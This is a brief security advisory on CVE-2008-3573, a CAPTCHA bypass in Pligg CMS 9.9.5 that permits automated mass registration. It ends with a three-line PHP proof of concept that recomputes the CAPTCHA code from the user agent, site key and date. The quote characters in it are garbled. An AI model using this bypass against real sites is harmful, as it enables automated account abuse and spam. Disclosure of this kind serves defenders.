Pligg CMS 9.9.5 - 'CAPTCHA' Registration Automation Security Bypass

Related Vulnerabilities: CVE-2008-3573  
Publish Date: 02 Aug 2008

Pligg is prone to a security-bypass weakness.

Successfully exploiting this issue will allow an attacker to register multiple new users through an automated process. This may lead to other attacks.

Pligg 9.9.5 is vulnerable; other versions may also be affected.




$datekey = date(�F j�);

$rcode = hexdec(md5($_SERVER['HTTP_USER_AGENT'] . $sitekey . $ts_random . $datekey));

print substr($rcode, 2, 6);
